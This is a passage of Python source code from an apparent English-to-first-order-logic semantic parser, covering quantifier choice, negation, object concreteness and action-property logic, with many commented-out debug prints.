logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"&\",obj_logic]]]\n\n elif iscondition and is_var(subjrepr):\n # hard case: if a bear is nice, it has a tail\n # but: if bears are nice, cars are red\n # both cases can be wrong \n #debug_print(\"subject\",subject)\n #debug_print(\"subject_det\",subject_det)\n #debug_print(\"subject_quant\",subject_quant)\n if (subject and not(subjispronoun) and word_has_feat(subject,\"Number\",\"Plur\") and\n ((not subject_quant and not subject_det) or\n (subject_quant and subject_quant[\"lemma\"] in [\"all\",\"every\",\"each\"]))): \n quantifier=\"forall\"\n logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"=>\",obj_logic]]] \n #debug_print(\"logic x\",logic)\n else:\n logic=[\"logic\",tree,[\"and\",subj_logic,obj_logic]] \n elif subjispronoun:\n #debug_print(\"checkpoint subjispronoun\",subjispronoun)\n logic=[\"logic\",tree,obj_logic]\n #logic=[\"logic\",tree,[\"and\",subj_logic,obj_logic]]\n elif subjspecialvar:\n logic=[\"logic\",tree,[subj_logic,\"=>\",obj_logic]]\n elif not(subjispronoun) and subject_quant and subject_quant[\"lemma\"] in [\"some\",\"exist\"]:\n quantifier=\"exists\"\n logic=[\"logic\",tree,[quantifier,[var],[\"and\",subj_logic,obj_logic]]]\n elif subjconst:\n #debug_print(\"checkpoint subj_logic\",subj_logic)\n obj_logic=make_obj_logic(ctxt,sentence,subjconst,subjpart,verbpart,objpart,False,False,reversepolarity,abs(subj_confidence)) \n #debug_print(\"checkpoint c obj_logic\",obj_logic)\n framevars=collect_frame_vars(obj_logic)\n #debug_print(\"checkpoint d framevars\",framevars)\n if framevars:\n obj_logic=merge_known_framevars(obj_logic,framevars)\n framevars=[framevars[0]]\n if type(obj_logic)==list and obj_logic[0]==\"not\": \n obj_logic=[\"not\",[\"exists\",framevars,obj_logic[1]]] \n else:\n obj_logic=[\"exists\",framevars,obj_logic] \n #debug_print(\"checkpoint d obj_logic\",obj_logic) \n logic=[\"and\",subj_logic,obj_logic]\n for fvar in subjvars:\n if fvar!=subjrepr and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n logic=[\"exists\",[fvar],logic] \n logic=[\"logic\",tree,logic]\n #debug_print(\"logic end 1\",logic[2]) \n elif sargument: \n #debug_print(\"subject\",subject)\n #debug_print(\"sargument\",sargument)\n #debug_print(\"svar\",svar)\n #debug_print(\"subjvars\",subjvars)\n #debug_print(\"subj_confidence\",subj_confidence)\n if svar:\n #debug_print(\"svar\",svar)\n if ctxt[\"isquestion\"] or (sargument and type(sargument)==dict and (subjispronoun or sargument[\"upos\"]==\"PROPN\")):\n quantifier=\"exists\" \n logic=[\"logic\",tree,[quantifier,[svar],[\"and\",subj_logic,obj_logic]]] \n else:\n quantifier=\"forall\" \n logic=[\"logic\",tree,[quantifier,[svar],[subj_logic,\"=>\",obj_logic]]] \n else:\n obj_logic=make_obj_logic(ctxt,sentence,subjrepr,subjpart,verbpart,objpart,False,False,reversepolarity,[abs(subj_confidence),True]) \n #debug_print(\"checkpoint d obj_logic\",obj_logic)\n framevars=collect_frame_vars(obj_logic)\n #debug_print(\"checkpoint e framevars\",framevars)\n if framevars:\n obj_logic=merge_known_framevars(obj_logic,framevars)\n framevars=[framevars[0]]\n if type(obj_logic)==list and obj_logic[0]==\"not\": \n obj_logic=[\"not\",[\"exists\",framevars,obj_logic[1]]] \n else:\n obj_logic=[\"exists\",framevars,obj_logic] \n \n logic=[\"logic\",tree,[\"and\",subj_logic,obj_logic]] \n #debug_print(\"logic end 2\",logic[2]) \n else:\n quantifier=\"forall\" \n logic=[\"logic\",tree,[quantifier,[var],[subj_logic,\"=>\",obj_logic]]]\n \n #debug_print(\"obj_logic y\",obj_logic)\n #debug_print(\"logic y\",logic)\n #debug_print(\"ctxt[objects] a\",ctxt[\"objects\"])\n\n if subjrepr!=dummysubject:\n ctxt[\"passed_words\"].append([subjrepr,subject,\"subject\"])\n if objrepr!=dummysubject: \n ctxt[\"passed_words\"].append([objrepr,object,\"object\"])\n if ((not ctxt[\"isquestion\"]) and (not iscondition) and (not isconsequence) and\n subjrepr and not is_var(subjrepr)):\n update_ctxt_objects(ctxt,subjrepr,subject,logic)\n\n logic=prop_flatten_logic_term(logic)\n logic=simplify_quantors(logic)\n if iscondition: \n logic=remove_confidence_annotations(ctxt,logic) \n \n return logic \n\n # - - - - - general case - - - - -\n \n elif type(verb)==dict: \n \n #debug_print(\"general case\")\n #debug_print(\"sentence_type\",sentence_type)\n if sentence_type==\"is_of\": \n # Elephants are afraid of mice\n object_data=make_object_data(ctxt,sentence,relatedobject[\"obj\"])\n #debug_print(\"object_data\",object_data)\n elif verb[\"lemma\"] in [\"have\"]: sentence_type=\"has\"\n elif \"relation\" in verb and verb[\"relation\"]: sentence_type=\"verb_relation\"\n else: sentence_type=None\n #debug_print(\"sentence_type\",sentence_type)\n \n if sentence_type==\"is_of\":\n verb_is_positive=get_word_polarity(ctxt,sentence,relation_word) \n elif sentence_type==\"verb_relation\":\n verb_is_positive=get_word_polarity(ctxt,sentence,verb)\n else: \n verb_is_positive=get_word_polarity(ctxt,sentence,verb)\n \n verb_confidence=get_word_confidence(ctxt,sentence,verb) \n orig_verb_confidence=verb_confidence \n if verb_confidence==0: return None \n elif verb_confidence<0: \n verb_confidence=0-verb_confidence\n verb_is_positive=not verb_is_positive \n #debug_print(\"verb_confidence abs\",verb_confidence) \n #debug_print(\"verb_is_positive\",verb_is_positive)\n\n #debug_print(\"subject\",subject)\n subj_quant_confidence=get_word_quantor_confidence(ctxt,sentence,subject)\n subj_confidence=top_confidence*subj_quant_confidence \n if subj_confidence==0: return None \n elif subj_confidence<0: verb_is_positive=not verb_is_positive \n obj_quant_confidence=1\n\n if verb_in_past(ctxt,sentence,verb): # word_has_feat(verb,\"Tense\",\"Past\"):\n verb_is_past=True\n else: \n verb_is_past=False \n \n #debug_print(\"subject_quant\",subject_quant)\n #debug_print(\"subject_quantifier\",subject_quantifier)\n if subject_quantifier:\n None\n elif subject_quant and subject_quant[\"lemma\"] in [\"some\",\"exists\"]:\n subject_quantifier=\"exists\"\n elif subject_quant and subject_quant[\"lemma\"] in [\"no\",\"zero\"]:\n subject_quantifier=\"forall\" \n verb_is_positive=not verb_is_positive \n elif ctxt[\"isquestion\"] and verb_is_past and not (\"?:\" in subjrepr and \"_every\" in subjrepr):\n subject_quantifier=\"exists\"\n elif iscondition:\n # \"If a person needs John, they are nice.\" \n if (subject and not(subjispronoun) and word_has_feat(subject,\"Number\",\"Plur\") and\n ((not subject_quant and not subject_det) or\n (subject_quant and subject_quant[\"lemma\"] in [\"all\",\"every\",\"each\"]))): \n subject_quantifier=\"forall\"\n else:\n subject_quantifier=\"exists\" \n elif (verb[\"lemma\"]==\"be\" and\n word_has_child_in_deprel_lemma(ctxt,sentence,verb,\"expl\",[\"there\"])):\n # \"There is a ghost in the room?\"\n subject_quantifier=\"exists\" \n elif (verb[\"lemma\"]==\"be\" and (\"relation\" in verb) and\n (verb[\"relation\"] in is_location_relations)): \n # \"A ghost is in the room?\"\n subject_quantifier=\"exists\" \n elif sargument and not svar:\n subject_quantifier=None \n else:\n subject_quantifier=\"forall\" \n\n #debug_print(\"subject\",subject) \n #debug_print(\"subj_logic\",subj_logic) \n #debug_print(\"verb_is_positive\",verb_is_positive) \n #debug_print(\"object\",object)\n obj_logic=None\n if object:\n if not(type(object_data)==list and object_data[0] in [\"and\",\"or\",\"nor\",\"xor\"]):\n object_data=[\"single\",object_data]\n if object_quant and object_quant[\"lemma\"] in [\"some\"]:\n object_quantifier=\"exists\"\n elif object_quant and object_quant[\"lemma\"] in [\"all\",\"every\",\"each\",\"most\"]:\n object_quantifier=\"forall\" \n if object_quant[\"lemma\"] in [\"most\"]: obj_quant_confidence=0.9 \n elif (verb[\"lemma\"] in like_type_verbs and\n (verb[\"lemma\"] not in have_type_verbs) and \n word_has_feat(verb,\"VerbForm\",\"Fin\") and\n word_has_feat(subject,\"Number\",\"Plur\") and\n word_has_feat(object,\"Number\",\"Plur\") and\n not is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,\n isobject=True)):\n #People like dogs\n #debug_print(\"cp1\")\n object_quantifier=\"forall\" \n if obj_quant_confidence==1: obj_quant_confidence=0.95\n elif sentence_type==\"is_of\":\n #debug_print(\"cp2 is_of\")\n object_quantifier=\"forall\"\n if not is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,isobject=True):\n #debug_print(\"cp3 is_of\")\n if obj_quant_confidence==1: obj_quant_confidence=0.95 \n else:\n # Animals have legs\n # Nails are made of iron.\n object_quantifier=\"exists\" \n \n else:\n object_data=[\"single\",\"$dummy_act_object\"] \n object_quantifier=None\n obj_logic=None\n objrepr=None\n \n #debug_print(\"object_quantifier\",object_quantifier)\n #debug_print(\"object_data2\",object_data) \n \n if subjrepr!=dummysubject:\n ctxt[\"passed_words\"].append([subjrepr,subject,\"subject\"])\n\n if type(object_data)==list and object_data[0] in [\"single\",\"and\",\"or\",\"nor\",\"xor\"]: \n #debug_print(\"cp4\")\n mainop=object_data[0]\n all_objects_logic=[mainop] \n \n #debug_print(\"object_data\",object_data) \n #debug_print(\"all_objects_logic 1\",all_objects_logic)\n \n for thisobject in object_data[1:]:\n #debug_print(\"thisobject\",thisobject)\n if thisobject==\"$dummy_act_object\":\n None\n else: \n objpart=thisobject[\"objpart\"]\n #debug_print(\"thisobject\",thisobject)\n #debug_print(\"parent_object_pair\",parent_object_pair)\n #debug_print(\"iscondition\",iscondition)\n #debug_print(\"isconsequence\",isconsequence)\n #debug_print(\"subjpart\",subjpart)\n #debug_print(\"verbpart\",verbpart)\n #debug_print(\"objpart\",objpart) \n #debug_print(\"verb_is_positive\",verb_is_positive)\n #debug_print(\"all_objects_logic\",all_objects_logic)\n #debug_print(\"objpart\",objpart)\n object=get_thing(objpart)\n #debug_print(\"object\",object) \n objspecialvar=None\n objconst=None \n object_det=get_word_det(ctxt,sentence,object)\n #objispronoun=False \n # prerefence of concreteness for objects in case of negation, like needed in:\n # [\"John does not eat a carrot. John eats a carrot?\",False],\n # [\"John is not in a cave. John is in a cave?\",False]\n tmp_obj_logic=None\n if ctxt[\"isquestion\"]: prefer_non_concrete=True\n elif not verb_is_positive: prefer_non_concrete=True\n else:\n tmp_obj_logic=make_obj_logic(ctxt,sentence,dummysubject,subjpart,verbpart,objpart)\n if tmp_obj_logic and type(tmp_obj_logic)==list and tmp_obj_logic[0] in [\"not\"]:\n prefer_non_concrete=True\n else:\n prefer_non_concrete=False\n #debug_print(\"tmp_obj_logic\",tmp_obj_logic)\n\n if parent_object_pair and object==parent_object_pair[1]:\n #John had a car which Eve bought\n #Bears who eat fish are strong\n objrepr=parent_object_pair[0] \n elif pronoun(ctxt,object):\n tmp=resolve_pronoun(ctxt,sentence,object,tree,verb,subject)\n #debug_print(\"ctxt[objects] after resolve_pronoun of general handling\",ctxt[\"objects\"])\n if not tmp:\n print(\"error: cannot resolve pronoun, case 4\",object)\n sys.exit(0)\n return None\n object=tmp[1]\n objrepr=tmp[0]\n elif object and type(object)==dict and variable_shaped_lemma(object[\"lemma\"]):\n ovar=\"?:\"+object[\"text\"]\n objspecialvar=ovar \n objrepr=objspecialvar\n elif object and type(object)==dict and object[\"upos\"] in [\"PROPN\"]:\n objconst=find_make_constant(ctxt,sentence,object)\n objrepr=objconst\n elif is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,\n isobject=True,prefer_non_concrete=prefer_non_concrete):\n #debug_print(\"in main object is concrete\", object) \n if tmp_obj_logic: \n tmp_logic=tmp_obj_logic\n else: \n tmp_logic=make_obj_logic(ctxt,sentence,dummysubject,subjpart,verbpart,objpart) \n #debug_print(\"tmp_logic 2\",tmp_logic) \n tmp_logic=prop_flatten_logic_term(tmp_logic) \n objconst=make_determined_constant(ctxt,sentence,object,object_det,tmp_logic,verb) \n objrepr=objconst \n tmp_logic=logic_replace_el(tmp_logic,dummysubject,objrepr)\n obj_logic=tmp_logic\n #debug_print(\"obj_logic 2\",obj_logic)\n object_quantifier=None \n elif object_data and object_data[0]==\"single\" and object_data[1] and \"objrepr\" in object_data[1]:\n objrepr=object_data[1][\"objrepr\"] \n else:\n ovar=\"?:O\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n objrepr=ovar \n if parent_object_pair and objrepr==parent_object_pair[0]:\n object_quantifier=None \n\n objvars=collect_free_vars(obj_logic) \n if objrepr and type(objrepr)==list and is_theof_or_measure_function(objrepr[0]):\n argvar=objrepr[2]\n else:\n argvar=None \n \n #debug_print(\"objvars\",objvars)\n #debug_print(\"subjrepr\",subjrepr)\n #debug_print(\"objrepr\",objrepr) \n #debug_print(\"argvar\",argvar)\n #debug_print(\"obj_logic 1\",obj_logic)\n\n for fvar in objvars:\n if fvar!=objrepr and fvar!=subjrepr and fvar!=argvar and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n obj_logic=[\"exists\",[fvar],obj_logic] \n actionrepr=\"?:A\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n #debug_print(\"obj_logic 1a\",obj_logic)\n \n if not objrepr:\n object_is_positive=True\n else:\n #debug_print(\"main objrepr before\",objrepr)\n #debug_print(\"main obj_logic before\",obj_logic)\n if type(objrepr)!=list:\n obj_logic=make_simple_obj_logic(ctxt,sentence,objrepr,subjpart,verbpart,objpart,actionrepr,orig_verb_confidence==1)\n #debug_print(\"obj_logic 1x\",obj_logic)\n #obj_logic=make_simple_obj_logic(ctxt,sentence,objrepr,subjpart,verbpart,objpart,actionrepr) \n objvars=collect_free_vars(obj_logic) \n\n #debug_print(\"obj_logic 3\",obj_logic)\n #debug_print(\"objvars2\",objvars)\n #debug_print(\"objrepr\",objrepr) \n #debug_print(\"argvar\",argvar)\n\n for fvar in objvars:\n if fvar!=objrepr and fvar!=subjrepr and fvar!=argvar and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n obj_logic=[\"exists\",[fvar],obj_logic] \n #debug_print(\"obj_logic 4\",obj_logic) \n #debug_print(\"main obj_logic of general handling\",obj_logic) \n #debug_print(\"main ctxt[objects] after make_simple_obj_logic of general handling\",ctxt[\"objects\"])\n if obj_logic and type(obj_logic)==list and obj_logic[0]==\"not\":\n object_is_positive=False\n obj_logic=obj_logic[1]\n else:\n object_is_positive=True \n\n if ((not ctxt[\"isquestion\"]) and (not iscondition) and (not isconsequence) and\n objrepr):\n #debug_print(\"about to update_ctxt_objects in main, objects are\") \n #show_objects(ctxt)\n update_ctxt_objects(ctxt,objrepr,object,obj_logic)\n #debug_print(\"after update_ctxt_objects in main, objects are\") \n #show_objects(ctxt) \n\n #debug_print(\"obj_logic\",obj_logic)\n #debug_print(\"objrepr\",objrepr)\n obj_logic_function=make_logic_counted_function(ctxt,sentence,obj_logic,objrepr,\n object,verb,subject,isobject=True,noplural=(iscondition or not verb_is_positive))\n #debug_print(\"obj_logic_function\",obj_logic_function)\n #debug_print(\"subjrepr\",subjrepr)\n #debug_print(\"objrepr\",objrepr)\n if (obj_logic_function and obj_logic_function[0] and \n not (type(subjrepr)==list and type(subjrepr[0])==str and subjrepr[0].startswith(measure_function))):\n substituted_function=apply_simple_defs(ctxt,obj_logic_function[1])\n sorted_substituted_function=sort_logic(ctxt,substituted_function)\n #objsetrepr=[set_function,obj_logic_function[1],subjrepr]\n objsetrepr=[set_function,sorted_substituted_function,subjrepr]\n countatom=logic_replace_el(obj_logic_function[0],objrepr,objsetrepr)\n debug_print(\"objsetrepr 1\",objsetrepr)\n #debug_print(\"substituted_function\",substituted_function)\n #debug_print(\"sorted_substituted_function\",sorted_substituted_function)\n #debug_print(\"countatom\",countatom)\n else:\n objsetrepr=None \n\n #debug_print(\"verb2\",verb)\n confidence=get_word_confidence(ctxt,sentence,verb) \n #debug_print(\"verb confidence2\",confidence)\n if (not confidence or confidence==1): # and verb[\"lemma\"] in [\"be\"]:\n confidence=get_word_confidence(ctxt,sentence,get_parent(sentence,verb)) \n if confidence==0: return None\n elif confidence<0: confidence=abs(confidence)\n if abs(subj_confidence)==1:\n confidence=confidence*obj_quant_confidence\n else:\n confidence=abs(subj_confidence)*obj_quant_confidence\n\n #debug_print(\"relation\",relation) \n #debug_print(\"subj_confidence\",subj_confidence)\n #debug_print(\"obj_quant_confidence\",obj_quant_confidence)\n #debug_print(\"confidence 3\",confidence)\n \n act_maintype=determine_act_main_type(ctxt,sentence,subject,verb,object)\n if objrepr:\n act_type=act_maintype+\"2\"\n else:\n act_type=act_maintype+\"1\" \n\n action_prop_logic=make_action_prop_logic(ctxt,sentence,verb,actionrepr,subject,subjrepr,tree,verb_is_positive,subjconst) \n #debug_print(\"created action_prop_logic\",action_prop_logic)\n #debug_print(\"objsetrepr\",objsetrepr)\n if objsetrepr:\n setrelation=make_atom_2(ctxt,sentence,verb,verb,True,subjrepr,objsetrepr,confidence,act_type,actionrepr)\n else:\n setrelation=None\n\n if sentence_type==\"is_of\":\n # Elephants are afraid of mice\n thingparam=relation_word\n else:\n thingparam=verb\n if objrepr: \n if subjrepr and is_var(subjrepr):\n relation=make_atom_2(ctxt,sentence,verb,thingparam,True,subjrepr,objrepr,confidence,act_type,actionrepr,blocker_preferred=True)\n else:\n relation=make_atom_2(ctxt,sentence,verb,thingparam,True,subjrepr,objrepr,confidence,act_type,actionrepr) \n else:\n relation=make_qualified_atom_1(ctxt,sentence,verb,thingparam,True,subjrepr,confidence,act_type,actionrepr,blocker_preferred=True) \n #debug_print(\"relation after\",relation)\n #debug_print(\"action_prop_logic\",action_prop_logic)\n\n if action_prop_logic:\n relation=[\"exists\",[actionrepr],[\"and\",action_prop_logic,relation]]\n else: \n relation=[\"exists\",[actionrepr],relation]\n\n #debug_print(\"relation\",relation) \n #debug_print(\"verb_is_positive\",verb_is_positive)\n #debug_print(\"object_is_positive\",object_is_positive)\n #debug_print(\"objrepr\",objrepr) \n if not verb_is_positive:\n object_is_positive=not object_is_positive\n\n #debug_print(\"relation\",relation) \n framevars=collect_frame_vars(relation)\n relation=merge_known_framevars(relation,framevars)\n if framevars: framevars=[framevars[0]]\n if framevars and not (\"isquestion\" in ctxt and ctxt[\"isquestion\"]):\n relation=[\"exists\",framevars,relation]\n framevars=collect_frame_vars(setrelation)\n setrelation=merge_known_framevars(setrelation,framevars)\n if framevars: framevars=[framevars[0]]\n if framevars and not (\"isquestion\" in ctxt and ctxt[\"isquestion\"]):\n setrelation=[\"exists\",framevars,setrelation] \n \n #debug_print(\"obj_logic\",obj_logic)\n #debug_print(\"object_quantifier\",object_quantifier)\n #debug_print(\"setrelation\",setrelation)\n #if countatom: debug_print(\"countatom\",countatom)\n\n if obj_logic==None: \n if setrelation:\n full_object_logic=[\"and\",relation,setrelation]\n else:\n full_object_logic=relation \n else: \n if objsetrepr and countatom:\n obj_logic=[\"and\",countatom,obj_logic]\n\n if object_quantifier==\"exists\":\n full_object_logic=[obj_logic,\"&\",relation]\n elif object_quantifier==None:\n full_object_logic=[obj_logic,\"&\",relation] \n else: \n full_object_logic=[obj_logic,\"=>\",relation]\n\n if not objspecialvar:\n if object_quantifier: \n full_object_logic=[object_quantifier,[objrepr],full_object_logic] \n if objrepr and type(objrepr)==list and is_theof_or_measure_function(objrepr[0]):\n quantvar=objrepr[2] \n full_object_logic=[\"exists\",[quantvar],full_object_logic]\n\n if objrepr!=dummysubject: \n ctxt[\"passed_words\"].append([objrepr,object,\"object\"])\n \n if subject_quantifier==\"exists\" and subjrepr and unknownsubject in subjrepr:\n # Colin is wounded\n #debug_print(\"subject_quantifier1 subjrepr\",[subject_quantifier,subjrepr]) \n full_object_logic=[\"exists\",[subjrepr],full_object_logic]\n if not object_is_positive:\n full_object_logic=[\"not\",full_object_logic] \n #debug_print(\"full_object_logic\",full_object_logic) \n all_objects_logic.append(full_object_logic)\n #debug_print(\"all_objects_logic 2\",all_objects_logic)\n \n if all_objects_logic and all_objects_logic[0]==\"single\": \n all_objects_logic=all_objects_logic[1]\n \n #debug_print(\"subj_logic\",subj_logic)\n #debug_print(\"sargument\",sargument)\n #debug_print(\"subjspecialvar\",subjspecialvar)\n #debug_print(\"subjrepr\",subjrepr)\n #debug_print(\"all_objects_logic 3\",all_objects_logic)\n #debug_print(\"subject_quantifier subjrepr\",[subject_quantifier,subjrepr])\n\n if sargument:\n if svar:\n #debug_print(\"is svar\",svar)\n #quantifier=\"forall\" \n #res=[\"logic\",tree,[quantifier,[svar],[subj_logic,\"=>\",all_objects_logic]]] \n quantifier=\"exists\" \n logic=[\"and\",subj_logic,all_objects_logic]\n for fvar in subjvars:\n if fvar!=subjrepr and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n logic=[\"exists\",[fvar],logic]\n res=[\"logic\",tree,[quantifier,[svar],logic]] \n else:\n #debug_print(\"not svar\")\n reversepolarity=False\n obj_logic=make_obj_logic(ctxt,sentence,subjrepr,subjpart,verbpart,objpart,False,False,reversepolarity,abs(subj_confidence)) \n logic=[\"and\",subj_logic,all_objects_logic]\n for fvar in subjvars:\n if fvar!=subjrepr and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n logic=[\"exists\",[fvar],logic]\n for fvar in subjvars:\n if fvar!=subjrepr and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n logic=[\"exists\",[fvar],logic] \n res=[\"logic\",tree,logic] \n elif not subjspecialvar: \n if subject_quantifier==\"exists\": # and (not ctxt[\"isquestion\"]):\n res=[subject_quantifier,[subjrepr],[\"and\",subj_logic,all_objects_logic]] \n elif iscondition or subjispronoun: # or ctxt[\"isquestion\"]: \n if (subject_quantifier==\"forall\" and subject and not(subjispronoun) and word_has_feat(subject,\"Number\",\"Plur\") and\n ((not subject_quant and not subject_det) or\n (subject_quant and subject_quant[\"lemma\"] in [\"all\",\"every\",\"each\"]))):\n quantifier=\"forall\"\n res=[subj_logic,\"=>\",all_objects_logic]\n else:\n res=[\"and\",subj_logic,all_objects_logic]\n elif subjconst: \n res=[\"and\",subj_logic,all_objects_logic] \n else: \n res=[subject_quantifier,[subjrepr],[subj_logic,\"=>\",all_objects_logic]] \n elif subject_quantifier==\"exists\" and subjrepr and unknownsubject in subjrepr:\n # Colin is wounded\n quantifier=\"exists\" \n res=[\"logic\",tree,all_objects_logic] \n else: \n res=[subj_logic,\"=>\",all_objects_logic]\n \n res=prop_flatten_logic_term(res)\n logic=simplify_quantors(res)\n if iscondition: \n logic=remove_confidence_annotations(ctxt,res)\n #debug_print(\"general case returns logic\",logic) \n return logic\n\n\ndef is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,isobject=False,prefer_non_concrete=False):\n #debug_print(\"is_concrete_thing object iscondition isconsequence\",[object,iscondition,isconsequence])\n #debug_print(\"is_concrete_thing verb\",verb)\n #debug_print(\"is_concrete_thing object_det\",object_det)\n #debug_print(\"is_concrete_thing isobject\",isobject)\n #debug_print(\"is_concrete_thing prefer_non_concrete\",prefer_non_concrete)\n if not object: return False\n\n #if object[\"lemma\"] in [\"woman\"]: return False\n\n if type(object)==dict and \"argument\" in object:\n argument=object[\"argument\"]\n argument_det=get_word_det(ctxt,sentence,argument)\n #debug_print(\"argument\",argument)\n #debug_print(\"argument_det\",argument_det)\n is_concrete_argument=is_concrete_thing(ctxt,sentence,argument,argument_det,\n verb,iscondition,isconsequence,isobject,prefer_non_concrete=prefer_non_concrete) \n #debug_print(\"is_concrete_argument\", is_concrete_argument) \n if is_concrete_argument and (object_det and object_det[\"lemma\"] in [\"the\"]):\n #debug_print(\"concrete argument-having object v1\")\n return True\n elif is_concrete_argument and (object[\"upos\"] in [\"NOUN\"] and object[\"lemma\"] in measure_words):\n #debug_print(\"concrete argument-having object v2\")\n return True \n elif ((object[\"lemma\"] in measure_words) and\n \"preposition\" in argument and argument[\"preposition\"] in [\"'s\"]):\n #debug_print(\"concrete argument-having object v3\")\n return True \n else:\n #debug_print(\"non-concrete argument-having object\")\n return False\n if (type(object)==dict and \n ((object[\"upos\"] in [\"PROPN\"] and (\"ner\" not in object or object[\"ner\"] not in [\"NORP\",\"S-NORP\"])) or \n (ctxt[\"isquestion\"] and object[\"lemma\"] in [\"whom\",\"who\",\"what\"]))):\n # also \"Whom is Ellen afraid of?\" where whom is pron, while \"who\" would be propn \n return True\n #elif (type(object)==dict and \n # (ctxt[\"isquestion\"] and object[\"lemma\"] in [\"whom\",\"who\",\"what\"])):\n # # also \"Whom is Ellen afraid of?\" where whom is pron, while \"who\" would be propn \n # debug_print(\"cpz object\",object) \n # return False \n elif (type(object)==dict and is_measure_unit(ctxt,object[\"lemma\"]) and \n word_has_child_in_deprel_upos(ctxt,sentence,object,[\"nummod\"],[\"NUM\"])):\n #debug_print(\"found measure object\",object) \n return True\n elif not object_det: \n #debug_print(\"no object_det\") \n if object[\"upos\"] in [\"NOUN\"] and verb and verb_in_past(ctxt,sentence,verb):\n # Nails are made of metal\n if (\"be\" in verb) and not verb_in_past(ctxt,sentence,verb[\"be\"]):\n return False\n #elif prefer_non_concrete:\n # return False \n else: \n return True\n #elif verb and verb[\"lemma\"] in [\"be\"]:\n # return \n elif type(object)==dict and \"ner\" in object and object[\"ner\"] in [\"S-DATE\"]:\n return True\n else: \n return False \n if ((iscondition or isconsequence or ctxt[\"isquestion\"]) and object_det and object_det[\"lemma\"] in [\"the\"]): \n # the (iscondition or or ctxt[\"isquestion\"]) prohibits OK answer to: \n # \"John is a man Mary liked. Mary liked the man?\"\n # initially for general case object we had: not ctxt[\"isquestion\"]:\n return True\n else:\n if isobject and verb and verb[\"lemma\"] in [\"have\"]:\n if ((not (iscondition or isconsequence or ctxt[\"isquestion\"])) and object_det[\"lemma\"] in [\"the\"]) :\n if find_existing_object(ctxt,sentence,object):\n return True \n else:\n return False \n elif ((not (iscondition or isconsequence or ctxt[\"isquestion\"])) and object_det[\"lemma\"] in [\"a\",\"an\",\"another\",\"the\"]) : \n if prefer_non_concrete:\n if object_det[\"lemma\"] in [\"a\",\"an\"]:\n return False\n else:\n return True \n else:\n return True\n return False \n\ndef is_measure_unit(ctxt,lemma):\n #debug_print(\"lemma\",lemma)\n for el in measure_words:\n if \"units\" in measure_words[el] and lemma in measure_words[el][\"units\"]:\n return True\n #debug_print(\"False\",False) \n return False\n\n\ndef determine_act_main_type(ctxt,sentence,subject,verb,object):\n #debug_print(\"determine_act_main_type subject verb object\",[subject,verb,object])\n if has_aux_from_list(sentence,verb,[\"can\"]):\n res=\"can\"\n else: \n subject_det=get_word_det(ctxt,sentence,subject) \n if subject_det in [\"the\",\"a\",\"an\",\"this\",\"these\"]:\n res=\"act\"\n elif word_has_feat(verb,\"VerbForm\",\"Inf\"): \n if (verb_in_past(ctxt,sentence,verb) or\n ((\"be\" in verb) and (verb[\"be\"][\"lemma\"]==\"be\"))):\n # The radio is working\n res=\"act\"\n else: \n res=\"do\" \n elif verb_in_past(ctxt,sentence,verb): \n res=\"act\"\n elif not (word_has_feat(verb,\"Tense\",\"Pres\")): \n res=\"act\"\n else:\n res=\"do\" \n # debug_print(\"determine_act_main_type res\",res)\n return res\n\n\ndef make_action_prop_logic(ctxt,sentence,verb,actionvar,subject,subjrepr,tree,verb_is_positive,subject_is_concrete):\n #debug_print(\"make_action_prop_logic starts ------------------\")\n #debug_print(\"make_action_prop_logic verb\",verb)\n #debug_print(\"make_action_prop_logic actionrepr\",actionvar)\n #debug_print(\"make_action_prop_logic subject\",subject)\n #debug_print(\"make_action_prop_logic subjrepr\",subjrepr) \n #debug_print(\"make_action_prop_logic subject_is_concrete\",subject_is_concrete)\n \n if (\"relation\" in verb) and verb[\"relation\"]: return None\n if verb[\"lemma\"] in [\"be\"]: return None\n\n orig_isquestion=ctxt[\"isquestion\"]\n #ctxt[\"isquestion\"]=False\n\n andlist=[]\n listop=\"and\"\n verbchildren=get_children(sentence,verb)\n for child in verbchildren:\n # Bears eat quickly.\n sublist=[]\n sublistop=\"and\"\n proplogic=None\n if (((child[\"deprel\"] in [\"advmod\"] and child[\"upos\"] in [\"ADV\"]) or\n (child[\"deprel\"] in [\"xcomp\"] and child[\"upos\"] in [\"ADJ\"]))\n and\n not child[\"lemma\"] in [\"then\"]):\n positive=True\n proplogic=make_simple_conj_logic(ctxt,sentence,child,actionvar)\n #debug_print(\"make_action_prop_logic proplogic0\",proplogic) \n\n if proplogic: \n sublist.append(proplogic)\n if sublist: \n sublist=[sublistop]+sublist\n andlist.append(sublist)\n if andlist:\n andlist=[listop]+andlist \n #debug_print(\"action_prop_logic andlist 1\",andlist) \n \n sublist2=[]\n if \"relatedobjects\" in verb:\n #debug_print(\"CPXXXX relatedobjects found\")\n relatedobjects=verb[\"relatedobjects\"]\n for el in relatedobjects:\n # Bears eat in a forest \n # check if relatedobject should be used\n # eliminate with-probability\n #debug_print(\"el\",el) \n if (\"case\" in el and el[\"case\"][\"lemma\"] in [\"with\"] and\n \"obj\" in el):\n if el[\"obj\"][\"lemma\"] in probability_words: continue\n has_probability=False\n for child in verbchildren:\n if child[\"deprel\"] in [\"obl\"] and child[\"lemma\"] in probability_words:\n has_probability=True\n break\n if has_probability and el[\"obj\"][\"lemma\"] in [\"percent\"]: \n continue \n\n # ok, should be used\n\n positive=True\n actionobjectvar=\"?:AO\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n\n objpart=el[\"proplogic\"]\n #debug_print(\"objpart\",objpart)\n object_data=make_object_data(ctxt,sentence,objpart)\n #debug_print(\"object_data\",object_data)\n object=get_thing(objpart)\n objspecialvar=None\n objconst=None \n object_det=get_word_det(ctxt,sentence,object)\n 